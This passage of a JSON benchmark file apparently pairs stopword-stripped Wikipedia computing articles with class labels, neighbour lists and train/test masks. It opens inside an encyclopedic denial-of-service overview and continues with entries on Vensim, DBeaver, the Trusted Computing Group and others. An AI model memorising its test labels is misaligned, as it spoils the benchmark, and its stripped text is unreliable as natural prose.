response data coming legitimate servers attack requests also sent udp require connection server means source ip verified request received server order bring awareness vulnerabilities campaigns started dedicated finding amplification vectors led people fixing resolvers resolvers shut completely attack works using worm infect hundreds thousands iot devices across internet worm propagates networks systems taking control poorly protected iot devices thermostats wi-fi enabled clocks washing machines device becomes enslaved usually owner user immediate indication iot device direct target attack used part larger attack newly enslaved devices called slaves bots hacker acquired desired number bots instruct bots try contact isp october 2016 mirai botnet attacked dyn isp sites twitter netflix etc soon occurred websites unreachable several hours type attack physically damaging certainly costly large internet companies get attacked rudy attack targets web applications starvation available sessions web server much like slowloris rudy keeps sessions halt using never-ending post transmissions sending arbitrarily large content-length header value manipuling maximum segment size selective acknowledgement sack may used remote peer cause denial service integer overflow linux kernel causing even kernel panic jonathan looney discovered cve-2019-11477 cve-2019-11478 cve-2019-11479 june 17 2019 shrew attack denial-of-service attack transmission control protocol uses short synchronized bursts traffic disrupt tcp connections link exploiting weakness tcp re-transmission timeout mechanism slow read attack sends legitimate application layer requests reads responses slowly thus trying exhaust server connection pool achieved advertising small number tcp receive window size time emptying clients tcp receive buffer slowly causes low data flow rate sophisticated low-bandwidth ddos attack form dos uses less traffic increases effectiveness aiming weak point victim system design i.e. attacker sends traffic consisting complicated requests system essentially sophisticated ddos attack lower cost due use less traffic smaller size making difficult identify ability hurt systems protected flow control mechanisms syn flood occurs host sends flood tcp/syn packets often forged sender address packets handled like connection request causing server spawn half-open connection sending back tcp/syn-ack packet acknowledge waiting packet response sender address response ack packet however sender address forged response never comes half-open connections saturate number available connections server make keeping responding legitimate requests attack ends teardrop attack involves sending mangled ip fragments overlapping oversized payloads target machine crash various operating systems bug tcp/ip fragmentation re-assembly code windows 3.1x windows 95 windows nt operating systems well versions linux prior versions 2.0.32 2.1.63 vulnerable attack although september 2009 vulnerability windows vista referred teardrop attack targeted smb2 higher layer tcp packets teardrop used one fields ip header “ fragment offset ” field indicating starting position offset data contained fragmented packet relative data original packet sum offset size one fragmented packet differs next fragmented packet packets overlap happens server vulnerable teardrop attacks unable reassemble packets resulting denial-of-service condition voice ip made abusive origination large numbers telephone voice calls inexpensive readily automated permitting call origins misrepresented caller id spoofing according us federal bureau investigation telephony denial-of-service tdos appeared part various fraudulent schemes telephony denial-of-service exist even without internet telephony 2002 new hampshire senate election phone jamming scandal telemarketers used flood political opponents spurious calls jam phone banks election day widespread publication number also flood enough calls render unusable happened accident 1981 multiple +1-area code-867-5309 subscribers inundated hundreds misdialed calls daily response song 867-5309/jenny tdos differs telephone harassment prank calls obscene phone calls number calls originated occupying lines continuously repeated automated calls victim prevented making receiving routine emergency telephone calls related exploits include sms flooding attacks black fax fax loop transmission takes router resources drop packet ttl value 1 less forward packet higher ttl value packet dropped due ttl expiry router cpu must generate send icmp time exceeded response generating many responses overload router cpu attack uses existing vulnerability universal plug play upnp protocol get around considerable amount present defense methods flood target network servers attack based dns amplification technique attack mechanism upnp router forwards requests one outer source another disregarding upnp behavior rules using upnp router returns data unexpected udp port bogus ip address making harder take simple action shut traffic flood according imperva researchers effective way stop attack companies lock upnp routers defensive responses denial-of-service attacks typically involve use combination attack detection traffic classification response tools aiming block traffic identify illegitimate allow traffic identify legitimate list prevention response tools provided application front-end hardware intelligent hardware placed network traffic reaches servers used networks conjunction routers switches application front end hardware analyzes data packets enter system identifies priority regular dangerous 25 bandwidth management vendors approaches ddos attacks cloud-based applications may based application layer analysis indicating whether incoming bulk traffic legitimate thus triggering elasticity decisions without economical implications ddos attack approaches mainly rely identified path value inside application monitor progress requests path markers called key completion indicators essence technique statistical methods assessing behavior incoming requests detect something unusual abnormal going analogy bricks-and-mortar department store customers spend average known percentage time different activities picking items examining putting back filling basket waiting pay paying leaving high-level activities correspond key completion indicators service site normal behavior determined abnormal behavior identified mob customers arrived store spent time picking items putting back never made purchases could flagged unusual behavior department store attempt adjust periods high activity bringing reserve employees short notice routinely mob start showing never buying anything could ruin store extra employee costs soon store would identify mob activity scale back number employees recognising mob provides profit served may make difficult legitimate customers get served mob presence saves store total ruin case elastic cloud services huge abnormal additional workload may incur significant charges cloud service provider technique used scale back even stop expansion server availability protect economic loss blackhole routing traffic attacked dns ip address sent black hole null interface non-existent server efficient avoid affecting network connectivity managed isp dns sinkhole routes traffic valid ip address analyzes traffic rejects bad packets sinkholing efficient severe attacks intrusion prevention systems ips effective attacks signatures associated however trend among attacks legitimate content bad intent intrusion-prevention systems work content recognition block behavior-based dos attacks asic based ips may detect block denial-of-service attacks processing power granularity analyze attacks act like circuit breaker automated way rate-based ips rbips must analyze traffic granularly continuously monitor traffic pattern determine traffic anomaly must let legitimate traffic flow blocking dos attack traffic focused problem ips dos defense system dds block connection-based dos attacks legitimate content bad intent dds also address protocol attacks teardrop ping death rate-based attacks icmp floods syn floods case simple attack firewall could simple rule added deny incoming traffic attackers based protocols ports originating ip addresses complex attacks however hard block simple rules example ongoing attack port 80 web service possible drop incoming traffic port prevent server serving legitimate traffic additionally firewalls may deep network hierarchy routers adversely affected traffic gets firewall also many security tools still support ipv6 may configured properly firewalls often might get bypassed attacks similar switches routers rate-limiting acl capability manually set routers easily overwhelmed dos attack cisco ios optional features reduce impact flooding switches rate-limiting acl capability switches provide automatic and/or system-wide rate limiting traffic shaping delayed binding tcp splicing deep packet inspection bogon filtering bogus ip filtering detect remediate dos attacks automatic rate filtering wan link failover balancing schemes work long dos attacks prevented using example syn flood prevented using delayed binding tcp splicing similarly content based dos may prevented using deep packet inspection attacks originating dark addresses going dark addresses prevented using bogon filtering automatic rate filtering work long set rate-thresholds set correctly wan-link failover work long links dos/ddos prevention mechanism traffic passed cleaning center scrubbing center via various methods proxies tunnels digital cross connects even direct circuits separates bad traffic ddos also common internet attacks sends good traffic beyond server provider needs central connectivity internet manage kind service unless happen located within facility cleaning center scrubbing center ddos attacks overwhelm type hardware firewall passing malicious traffic large mature networks becomes effective economically sustainable ddos unintentional denial-of-service occur system ends denied due deliberate attack single individual group individuals simply due sudden enormous spike popularity happen extremely popular website posts prominent link second less well-prepared site example part news story result significant proportion primary site regular userspotentially hundreds thousands peopleclick link space hours effect target website ddos attack vipdos specifically link posted celebrity michael jackson died 2009 websites google twitter slowed even crashed many sites servers thought requests virus spyware trying cause denial-of-service attack warning users queries looked like automated requests computer virus spyware application news sites link sitessites whose primary function provide links interesting content elsewhere internetare likely cause phenomenon canonical example slashdot effect receiving traffic slashdot also known reddit hug death digg effect routers also known create unintentional dos attacks d-link netgear routers overloaded ntp servers flooding ntp servers without respecting restrictions client types geographical limitations similar unintentional denials-of-service also occur via media e.g url mentioned television server indexed google another search engine peak periods activity lot available bandwidth indexed also experience effects dos attack legal action taken least one case 2006 universal tube rollform equipment corporation sued youtube massive numbers would-be youtube.com users accidentally typed tube company url utube.com result tube company ended spend large amounts money upgrading bandwidth company appears taken advantage situation utube.com containing ads advertisement revenue march 2014 malaysia airlines flight 370 went missing digitalglobe launched crowdsourcing service users could help search missing jet satellite images response overwhelmed company servers unintentional denial-of-service may also result prescheduled event created website case census australia 2016 could caused server provides service specific time might university website setting grades available result many login requests time computer network security backscatter side-effect spoofed denial-of-service attack kind attack attacker spoofs forges source address ip packets sent victim general victim machine distinguish spoofed packets legitimate packets victim responds spoofed packets normally would response packets known backscatter attacker spoofing source addresses randomly backscatter response packets victim sent back random destinations effect used network telescopes indirect evidence attacks term backscatter analysis refers observing backscatter packets arriving statistically significant portion ip address space determine characteristics dos attacks victims many jurisdictions laws denial-of-service attacks illegal january 7 2013 anonymous posted petition whitehouse.gov site asking ddos recognized legal form protest similar occupy protests claim similarity purpose",
    "neighbors": [
      513,
      10756,
      1541,
      6667,
      2060,
      2076,
      8224,
      4133,
      6184,
      8244,
      10807,
      5178,
      5179,
      7739,
      1087,
      1088,
      4672,
      9282,
      9791,
      2118,
      8266,
      8779,
      9293,
      5199,
      6735,
      4689,
      11351,
      1625,
      10332,
      4194,
      612,
      2661,
      4198,
      10852,
      3688,
      10344,
      11364,
      9325,
      7791,
      5744,
      8818,
      2171,
      9339,
      5245,
      3711,
      5760,
      9855,
      5251,
      5764,
      3717,
      3724,
      6797,
      4238,
      2192,
      4753,
      8852,
      2709,
      8344,
      9372,
      157,
      2717,
      9375,
      10914,
      1187,
      8363,
      10412,
      10924,
      8366,
      5295,
      9393,
      6834,
      10417,
      7861,
      2240,
      2754,
      5316,
      7364,
      9413,
      11461,
      2251,
      6347,
      7893,
      7384,
      10457,
      6877,
      8413,
      3807,
      6368,
      225,
      8930,
      2799,
      1266,
      755,
      8950,
      2299,
      8956,
      5373,
      10492,
      6402,
      6403,
      8976,
      4883,
      4373,
      5397,
      793,
      794,
      5402,
      5404,
      3872,
      8998,
      823,
      5434,
      3390,
      9536,
      6466,
      3395,
      5446,
      4945,
      4435,
      5972,
      7003,
      4956,
      5469,
      7515,
      5472,
      865,
      9569,
      1892,
      3428,
      3941,
      6501,
      6504,
      4460,
      11122,
      9588,
      2423,
      7031,
      3964,
      6013,
      7037,
      10110,
      9089,
      2947,
      901,
      6534,
      4488,
      4490,
      5516,
      6540,
      4494,
      4495,
      7564,
      3473,
      11158,
      10651,
      9117,
      933,
      4522,
      939,
      1965,
      3503,
      7091,
      3508,
      953,
      4027,
      6080,
      8640,
      1474,
      8130,
      2508,
      4556,
      4558,
      3024,
      6613,
      3030,
      2007,
      3032,
      4054,
      9688,
      9181,
      2018,
      483,
      1512,
      4585,
      6122,
      8170,
      8176,
      4081,
      8692,
      2041,
      3581,
      2558,
      9727
    ],
    "mask": "Test"
  },
  {
    "node_id": 2410,
    "label": 9,
    "text": "Vensim:vensim vensim simulation software developed ventana systems primarily supports continuous simulation system dynamics discrete event agent-based modelling capabilities available commercially free personal learning edition vensim provides graphical modeling interface stock flow causal loop diagrams top text-based system equations declarative programming language includes patented method interactive tracing behavior causal links model structure well language extension automating quality control experiments models called reality check modeling language supports arrays subscripts permits mapping among dimensions aggregation built-in allocation functions satisfy constraints sometimes met conventional approaches like logit supports discrete delays queues variety stochastic processes multiple paths cross sectional time-series data import export including text files spreadsheets odbc models may calibrated data using optimization kalman filtering markov chain monte carlo methods sensitivity analysis options provide variety ways test sample models including monte carlo simulation latin hypercube sampling vensim model files packaged published customizable read-only format executed freely available model reader allows sharing interactive models users program and/or model author wish access model code base vensim general-purpose software used wide variety problem domains common high-profile applications include",
    "neighbors": [
      4792,
      10102,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 2411,
    "label": 8,
    "text": "Service_Mapping_Description:service mapping description service mapping description smd proposed standard describing machine-readable json format web services available particular endpoint goal similar principle wsdl",
    "neighbors": [
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 2412,
    "label": 2,
    "text": "Operating_system_abstraction_layer:operating system abstraction layer operating system abstraction layer osal provides application programming interface api abstract operating system making easier quicker develop code multiple software hardware platforms os abstraction layers deal presenting abstraction common system functionality offered operating system means providing meaningful easy use wrapper functions turn encapsulate system functions offered os code needs porting well designed osal provides implementations api several real-time operating systems vxworks ecos rtlinux rtems implementations may also provided non real-time operating systems allowing abstracted software developed tested developer friendly desktop environment addition os apis os abstraction layer project may also provide hardware abstraction layer designed provide portable interface hardware devices memory i/o ports non-volatile memory facilitate use apis osals generally include directory structure build automation e.g. set makefiles facilitate building project particular os hardware platform implementing projects using osals allows development portable embedded system software independent particular real-time operating system also allows embedded system software developed tested desktop workstations providing shorter development debug time",
    "neighbors": [
      9366,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 2413,
    "label": 1,
    "text": "DBeaver:dbeaver dbeaver sql client database administration tool relational databases uses jdbc api interact databases via jdbc driver databases nosql uses proprietary database drivers provides editor supports code completion syntax highlighting provides plugin architecture based eclipse plugins architecture allows users modify much application behavior provide database-specific functionality features database-independent desktop application written java based eclipse platform community edition ce dbeaver free open source software distributed apache license closed-source enterprise edition dbeaver distributed commercial license dbeaver started 2010 hobby project supposed free open-source good-looking convenient ui include frequently used features database developers first official release 2011 freecode quickly became popular tool open-source community year official web site founded community support forum moved github created 2012 eclipse plugin version released since dbeaver become one popular database extensions eclipse top 50-60 among eclipse extensions shortly various software vendors started integrate dbeaver mostly extensions proprietary eclipse rcp products zend studio nxtware deltadna etc. 2014 enterprise edition ee version released ee version based ce also provides support nosql/bigdata databases cassandra mongodb redis includes additional eclipse plugins 2015 dbeaver source code/community moved github 2017 dbeaver ce relicensed apache license starting version 4.x july 2017 dbeaver ee version became commercial order support ce version dbeaver cross-platform tool works platforms supported eclipse windows linux macos x solaris dbeaver available english chinese russian italian german full list released versions community edition ce initial version dbeaver released 2010 became open-source gpl 2011 ce version includes extended support following databases besides relational databases ce version supports wmi driver windows management instrumentation – works windows version year response multiple user requests eclipse plugin version released eclipse marketplace version used programmers use eclipse ide software development need database management tool right ide eclipse plugin includes features community edition also released gpl license dbeaver 3.x announced support nosql databases cassandra mongodb initial version since dbeaver divided community enterprise editions enterprise edition support nosql databases persistent query manager enterprise-level features ee version open-source requires purchase license trial license generated free charge list additional features dbeaver features include differences features available across different databases",
    "neighbors": [
      11392,
      8195,
      9868,
      10258,
      11030,
      8217,
      7453,
      1950,
      9503,
      2465,
      4771,
      5546,
      1579,
      7339,
      9389,
      10413,
      7983,
      9010,
      7347,
      5047,
      823,
      6721,
      6850,
      11457,
      9286,
      5964,
      5198,
      7506,
      4183,
      9687,
      9177,
      8539,
      10459,
      10340,
      6245,
      1383,
      8295,
      8683,
      5612,
      7022,
      3188,
      10873,
      2810,
      4604
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2414,
    "label": 0,
    "text": "Lexical_database:lexical database lexical database lexical resource associated software environment database permits access contents database may custom-designed lexical information general-purpose database lexical information entered information typically stored lexical database includes lexical category synonyms words well semantic phonological relations different words sets words",
    "neighbors": [
      416,
      3811,
      5639,
      7892,
      2901,
      7839
    ],
    "mask": "Test"
  },
  {
    "node_id": 2415,
    "label": 2,
    "text": "Envsys:envsys envsys framework kernel-level hardware monitoring sensors framework netbsd framework used close 85 device drivers export various environmental monitoring sensors evidenced references codice_1 symbol within codice_2 path netbsd temperature sensors codice_3 likely type exported given driver sensors registered kernel codice_4 api consumption monitoring sensors userland performed help codice_5 utility codice_6 codice_7 codice_8 pseudo-device file codice_9 power management daemon responds kernel events running scripts codice_10 well third-party tools like codice_11 gkrellm pkgsrc framework allows user amend monitoring limits specified driver driver perform monitoring sensors kernel space even programme hardware chip monitoring system automatically two levels limits defined critical warning additionally extend categorisation limit thresholds crossed kernel event may generated caught userland codice_9 execute pre-defined user script comparison openbsd hw.sensors monitoring user-defined values performed userspace codice_13 framework facilitate computer fan control although drivers could still implement interfacing fan-controlling capabilities chips means example driver-specific sysctl interface approach taken codice_14 driver however drivers popular super i/o chips like codice_15 codice_16 implement fan control fact historically openbsd netbsd dragonfly drivers n't even report duty cycle fans — actual rpm values reported framework undergone two major revisions first version codice_17 committed codice_18 man page following 2000 2007 manual page envsys 4 netbsd stated api experimental entire api replaced sysctl 8 one developed noted 2003 exact approach taken openbsd sysctl hw.sensors envsys 4 drivers ported openbsd second revision came serialisation userland reimplemented using property lists help netbsd new proplib 3 library underlying transport layer kernel userland still done ioctl envsys framework precursor openbsd sysctl hw.sensors framework 2003 many drivers well sensor types ported back forth netbsd openbsd support sensors codice_19 type added netbsd similar codice_19 type openbsd time bio 4 bioctl ported openbsd netbsd",
    "neighbors": [
      1286,
      1801,
      10000,
      274,
      9762,
      8998,
      1071,
      7983,
      11698,
      9671,
      1993,
      8909,
      1361,
      7383,
      4571,
      7907,
      1637,
      11623,
      1515,
      8816,
      2545,
      11506,
      5363,
      10102,
      2045,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 2416,
    "label": 4,
    "text": "Trusted_Computing_Group:trusted computing group trusted computing group group formed amd hewlett-packard ibm intel microsoft implement trusted computing concepts across personal computers trusted computing group announced 2003 successor trusted computing platform alliance previously formed 1999 many companies since joined trusted computing group including wave systems corp digital management inc. cisco lenovo infineon juniper networks fujitsu october 11 1999 trusted computing platform alliance abbreviated tcpa consortium various technology companies including compaq hewlett-packard ibm intel microsoft formed effort promote trust security personal computing platform november 1999 tcpa held founding conference announced 70 leading hardware software companies joined alliance since inception previous month january 30 2001 tcpa announced release version 1.0 trusted computing platform specifications aiming provide industry clear direction facilitates trust computing platforms environments december tcpa released version 1.1a trusted computing platform specifications ibm first original equipment manufacturer incorporate hardware features based version 1.1 tcpa trusted computing platform specifications introduction thinkpad t30 mobile computer april 24 2002 2003 tcpa succeeded trusted computing group increased emphasis trust mobile devices cell phones pdas tcg original goal development trusted platform module tpm semiconductor intellectual property core integrated circuit conforms trusted platform module specification put forward trusted computing group included computers enable trusted computing features tcg-compliant functionality since integrated directly certain mass-market chipsets tcg also recently released first version trusted network connect tnc protocol specification based principles aaa adding ability authorize network clients basis hardware configuration bios kernel version updates applied os anti-virus software etc 2009 tcg released set specifications describe protocol communicate self encrypting disk drives tcg storage work group swg storage core architecture specification describes detail implement utilize trust security services storage devices security subsystem class ssc specifications describe requirements specific classes devices specifically enterprise ssc defines minimum requirements data center server class devices opal ssc defines minimum requirements client devices vendor tpm-enabled system complete control software run owner system cases vendor may choose grant permission owner configure hardware legally purchased conversely restrict owner fully using property include possibility operating system os whether chosen user preinstalled hardware purchase refuses load unsigned unlicensed software e.g. microsoft described detail restrictions would enforced operating system tcg technology tpm provide case capability os lock software specific machine configurations meaning hacked versions os designed get around restrictions would work legitimate concern os vendors could use capabilities restrict software would load os hurting small software companies open source/shareware/freeware providers causing vendor lock-in data formats microsoft already stated begin restricting software allow run windows starting windows 8 arm tpm used conjunction boot loader ensure vendor-approved operating systems running could restrict alternative operating systems running including free open source operating systems example microsoft requiring x86/x64 machines come windows 8 secure boot enabled default caused alternative os vendors make payments microsoft ensure os able installed user additionally arm machine shipped windows 8 banned allowing another os installed time several projects experimenting tpm support free operating systems examples projects include tpm device driver linux open source implementation tcg trusted software stack called trousers also ported windows vista windows 7 2010 java interface tpm capabilities called tpm/j tpm-supporting version grub bootloader called trustedgrub tpm 1.1 specification envisioned standard pc platform equipped tpm chip scenario tpm chip serve hardware key storage additionally keep track so-called measurements platform i.e hashes various software able produce signed statements running software chain particularly latter mode operation proved unfeasible practice since amount software measured trusted large includes addition system firmware operating system drivers application programs therefore numerous tpm-related projects progress purpose make possible launch measure trusted subenvironment within untrusted environment tpm specification 1.2 enhanced accommodate mode operation additionally hardware changes required cpu chipset note confused inclusion tpm functionality chipset even though possibility intel approach called trusted execution technology txt many intel core 2 duo cpus advertised support extensions however chipset support required extensions operational currently intel chipset q35 express supports txt addition chipset support mainboard must also feature tpm 1.2 chip intel currently advertises dq35mp dq35jo compliant technology first application technology set manageability enhancements brand name vpro amd platform called secure execution mode 2002-2003 microsoft announced initiative called next-generation secure computing base formerly palladium basically vision tpm 1.2 chip cpu chipset software could provide environment software ecosystem trusted applications launched within regular windows could developed intel txt amd sem seen realizations hardware side ngscb vision owing significant difficulties creating working implementation third-party developers interested using unavailability enhancements cpu chipset ngscb included microsoft windows vista instead vista ships technologies make use subset functions tpm chip intel txt amd sem bitlocker drive encryption new version microsoft cryptography api group faced widescale opposition free software community grounds technology developing negative impact users privacy create customer lock-in especially used create drm applications received criticism gnu/linux freebsd communities well software development community general significant backlash amongst trusted computing group present richard stallman speech hackers planet earth conference july 2006 new york richard stallman free software foundation also criticized group publicly speeches criticism calls trusted computing treacherous computing instead warns vendors lock software officially signed specific vendors rendering unusable privacy concerns tcg revolve around fact tpm unique keypair called endorsement key identifies platform initial versions tpm version 1.1 tcg addressed privacy concerns suggesting use privacy ca could certify pseudonymous machine credentials separate credentials interacting different parties actions could linked level privacy provided however requires trust privacy ca could still link pseudonyms common identifying machine credential since left unresolved privacy concerns version 1.2 tpm specification introduced direct anonymous attestation protocol based idea zero-knowledge proof allows tpm user receive certification way privacy ca would able link requests single user platform still able identify rogue tpms privacy concerns tpm heightened christopher tarnovsky presented methods access compromise infineon tpm non-volatile memory capacity contains user data black hat 2010 efforts tcg specifications standardized iso active first part october 2007 member states iso/dis jtc1 expected send opinion iso july 24 2008 may 18 2009 tcg managed achieve standardization tpm specifications august 2014 approximately 100 promoters contributors adopters tcg specifications membership fees vary level promoters pay annual membership fees 30,000 contributors pay 15,000 depending upon company size adopters pay annual membership fees either 2,500 7,500",
    "neighbors": [
      7936,
      4353,
      517,
      5384,
      6282,
      3851,
      2213,
      9894,
      3880,
      5677,
      9390,
      7983,
      9137,
      7354,
      9791,
      851,
      2525,
      2275,
      1515,
      6509,
      8302,
      7794,
      3323,
      4221
    ],
    "mask": "Test"
  },
  {
    "node_id": 2417,
    "label": 2,
    "text": "Dependency_hell:dependency hell dependency hell colloquial term frustration software users installed software packages dependencies specific versions software packages dependency issue arises around shared packages libraries several packages dependencies depend different incompatible versions shared packages shared package library installed single version user may need address problem obtaining newer older versions dependent packages turn may break dependencies push problem another set packages dependency hell takes several forms specific computing platforms dependency hell often goes local specific name generally name components",
    "neighbors": [
      2310,
      6797,
      6680,
      8476,
      2853,
      10149,
      4775,
      6828,
      823,
      576,
      3522,
      7364,
      5067,
      9806,
      6871,
      6361,
      2010,
      5096,
      2666,
      9455,
      5872,
      10096,
      1522,
      2804
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2418,
    "label": 8,
    "text": "Executable_choreography:executable choreography executable choreography represents decentralized form service composition involving cooperation several individual entities improved form service choreography executable choreographies intuitively seen arbitrary complex workflows get executed systems belonging multiple organisations authorities executable choreographies actual code created encode system behavior global point view behavior main entities system given single program choreographies enhance quality software behave like executable blueprints communicating systems behave offer concise view message flows enacted system almost applications business logic must separated different services orchestration represents way services organized composed resulting service integrated hierarchically another composition service choreography global description participating services defined exchange messages rules interaction agreements two endpoints choreography employs decentralized approach service composition industry concept choreography generally considered non-executable standards proposed web services choreography description language present choreography formal model describe contracts autonomous entities generally distinct organizations participating composition services analyzed globally perspective composition must implemented centrally different orchestration mechanisms made available companies naive code composition use specific orchestration languages engines bpel business process execution language rule engines etc area academic research concept executable choreography proposed method longer contractual part actual part code two different artifacts non-synchronized require subjective interpretations examples executable calculus service choreography executable choreography framework dynamic service-oriented architectures approaches also practical impact often level articles least research projects real breakthrough blockchain recent years brought even attention academic community industry concept smart contract seen particular form executable choreography executable choreographies general concept necessarily verifiable choreographies use idea site regarded security context code execution examples approaches programming using executable choreographies could list european project choreos chor programming language web service modeling choreographing web services aspects related composition web services using pi-calculus verifiable term introduced highlight possibility verifying swarm choreographies explicit presence execution location idea leads possibility developing verification algorithms seen article levels privacy e-health systems cloud era encrypted cryptography supposes addition verification offer higher-level solutions advanced cryptographic methods without need programmers become cryptography specialists distributed applications could built subsystems allow identification verification architectural points expose secret data example ideally programming system uses encrypted choreographs guarantees least helps minimize situations person legally licensed hacker holds encrypted private data encryption keys related resources way administrators programmers subsystems fewer possibilities perform internal attacks privacy level frequent attacks even applications use approach encrypted choreographies minimize security risks caused people inside administer program systems thus number points discreet access data ideally never formally ensured form choreography useful allow companies secure code application legislation security rules assumed implementation encrypted choreographies implies example existence storage systems using cryptographic techniques practical implementation homomorphic encryption cryptdb implementation mit method also called storage division anonymization method help encrypted choreographies lead ideal total sovereignty within limits law private data published article private data system enabling self-sovereign storage managed executable choregraphies paper presents choreographies anonymize divide data way ensures data copied single administrator hacker controls one participating nodes implemented mechanisms also include interfaces easy use programmers advanced cryptographic methods serverless computing cloud computing model cloud provider dynamically manages allocation computing resources serverless choreographies involve automating launching methods using virtualization automation techniques implementation advanced type choreography requires development new business models facilitate cloud-based application hosting without friction related payment installation etc example tor concept provides example serverless systems best known example amazon lambda great commercial success allowing programmers ignore installation details facilitate dynamic scalability systems blockchains considered examples serverless databases serverless choreographies assume cloud execution storage done using encrypted choreographies using form choreography hosting companies individuals managing physical logical hosting infrastructure able influence hosted installation applications serverless choreographies present opportunity develop distributed decentralized systems potential formally secure advanced privacy properties",
    "neighbors": [
      9248,
      7537,
      9629,
      10102
    ],
    "mask": "Test"
  },
  {
    "node_id": 2419,
    "label": 4,
    "text": "Lew_Allen:lew allen lew allen jr. september 30 1925 – january 4 2010 united states air force four-star general served tenth chief staff united states air force chief staff allen served senior uniformed air force officer responsible organization training equipping 750,000 active duty air force air national guard air force reserve civilian personnel serving united states overseas member joint chiefs staff service chiefs function ed military advisers secretary defense national security council president born miami florida allen attended graduated high school gainesville texas 1942 entered united states military academy 1943 graduated 1946 bachelor science degree commission second lieutenant awarded pilot wings upon graduation flight training completing multi-engine flight training november 1946 allen assigned strategic air command 7th bombardment group carswell air force base texas flew b-29 superfortress bombers new long-range convair b-36 bomber allen also served various technical positions area nuclear weapons allen also attended air tactical course tyndall air force base florida next returned carswell air force base flight instructor assistant special weapons officer 7th bombardment wing september 1950 allen entered university illinois graduate study nuclear physics completed master science degree 1952 allen continued graduate study earned ph.d. physics 1954 completed experimental thesis high-energy photonuclear reactions allen assigned u.s. atomic energy commission los alamos scientific laboratory los alamos new mexico physicist test division became acquainted bomb designer ted taylor allen conducted experiments several different nuclear test series experiments concerned physics thermonuclear weapons design effects high altitude nuclear explosions conceivably used ballistic missile defense june 1957 december 1961 allen assigned kirtland air force base new mexico science adviser physics division air force special weapons center special weapons euphemism nuclear thermonuclear bombs allen specialized military effects high altitude nuclear explosions participated several nuclear weapons test series scientific director major experiment utilized large series high altitude rockets measure characteristics electrons trapped geomagnetic field exoatmospheric nuclear burst allen assigned december 1961 office secretary defense space technology office directorate research engineering washington d.c. june 1965 february 1973 assigned office secretary air force initially los angeles california deputy director advanced plans directorate special projects allen next moved pentagon june 1968 deputy director space systems june 1969 became director returned los angeles september 1970 assistant director special projects april 1971 became director special projects additional duty deputy commander satellite programs space missile systems organization serving briefly chief staff air force systems command andrews air force base maryland allen appointed march 1973 deputy director central intelligence intelligence community washington d.c august 1973 allen became director national security agency nsa chief central security service fort george g. meade maryland allen tenure nsa director noteworthy became first director ever testify publicly congress august 1977 named commander air force systems command allen served vice chief staff united states air force april 1978 became chief staff air force july 1978 nomination unusual never served overseas combat assignment positions specialized technical activities rather usual command structure air force also last chief staff bomber background subsequent chiefs staff except general norton schwartz fighter pilots trend reflected service weapon budgets devote funding fighters rather bombers following retirement air force 1982 allen became director jet propulsion laboratory jpl part voyager program space probes launched 1977 served director jpl 1990 allen member national academy engineering council foreign relations 1993 1995 allen served member president foreign intelligence advisory board pfiab intelligence oversight board allen awarded 1999 distinguished graduate award association graduates alumni association west point graduates allen died potomac falls virginia january 4 2010 complications rheumatoid arthritis buried arlington national cemetery march 22 2010 united states air force created general lew allen jr. trophy allen honor awarded annually officer senior nco aircraft maintenance munitions career fields directly involved setting aircraft sorties since 1986 jet propulsion laboratory awards honor lew allen award excellence 1990 called director research achievement award",
    "neighbors": [
      6017,
      8726,
      1189,
      9517,
      1838,
      5308,
      1986,
      6343,
      6344,
      11335,
      7119,
      7759,
      7887,
      3154,
      8276,
      7893,
      6749,
      991,
      7137,
      3305,
      7145,
      6005,
      6136,
      766
    ],
    "mask": "Test"
  },
  {
    "node_id": 2420,
    "label": 2,
    "text": "HP_Pre_3:hp pre 3 hp pre 3 styled pre touchscreen slider smartphone manufactured hewlett-packard device uses webos powered qualcomm snapdragon processor 3.6-inch screen conceptually successor palm pre 2 earlier pre pre plus models hp pre 3 announced february 9 2011 hp webos think beyond event held fort mason center san francisco alongside veer touchpad commercially released united kingdom august 17 2011 device supports new touch-to-share proximity-based sharing feature allows compatible devices touchpad instantly exchange data media information via bluetooth pre 3 802.11 a/b/g/n wi-fi 512 mb ram 8 gb internal storage bluetooth v2.1 1230 mah battery 16 gb model manufactured verizon united states models never released general public pre 3 released august 17 2011 united kingdom next day august 18 hp announced would discontinuing webos devices including pre 3 phone never officially released united states although models eventually sold hp employee store california many phones ended ebay auctions hp pre 3 features 3.58-inch multi-touch capacitive touchscreen resolution 800-by-480 pixels pre 3 three physical buttons input including volume up/down buttons side power button top navigating os pre 3 gesture area swipe enter card like multitasking view swipe right left go back application swipe left right go forward optionally swipe completely right left switch applications modifier keys combined gestures enable text selection cursor positioning command shortcuts triggered holding tap gesture area pressing key keyboard pre 3 supports bluetooth 2.1 802.11a/b/g/n wifi hspa+ well gsm evdo cdma depending service provider along hp touchpad pre 3 supports new technology called touch share touch share lets share urls phone calls text messages data 3rd party apps touchpad hp pre 3 tapping phone touchpad sensor example web site browsed touchpad transferred pre browser tapping two devices together umts frequency bands supported pre 3 mono loudspeaker well dual mic noise cancellation pre 3 features 5 mega pixel camera auto focus led flash capable 720p video recording phone also front-facing vga camera video calling integrated skype application pre 3 sold carphone warehouse uk competitive pay monthly contract terms limited available stock us gsm models sold direct hp employees 75 12 per employee branded unsupported either hp/palm though received over-the-air ota update 2.2.0 2.2.3 addition update webos 2.2.4 released update webos doctor ota update",
    "neighbors": [
      1537,
      3585,
      2308,
      10500,
      6790,
      5384,
      3340,
      1682,
      2962,
      405,
      3606,
      8982,
      10393,
      5019,
      6178,
      10658,
      5164,
      9266,
      9013,
      694,
      1849,
      9913,
      1083,
      1728,
      7492,
      10820,
      5318,
      11337,
      5963,
      9163,
      9037,
      2258,
      2259,
      1621,
      6618,
      5339,
      2784,
      4449,
      4832,
      3300,
      487,
      2285,
      9581,
      10606,
      1776,
      8952,
      10109,
      9598
    ],
    "mask": "Train"
  },
  {
    "node_id": 2421,
    "label": 2,
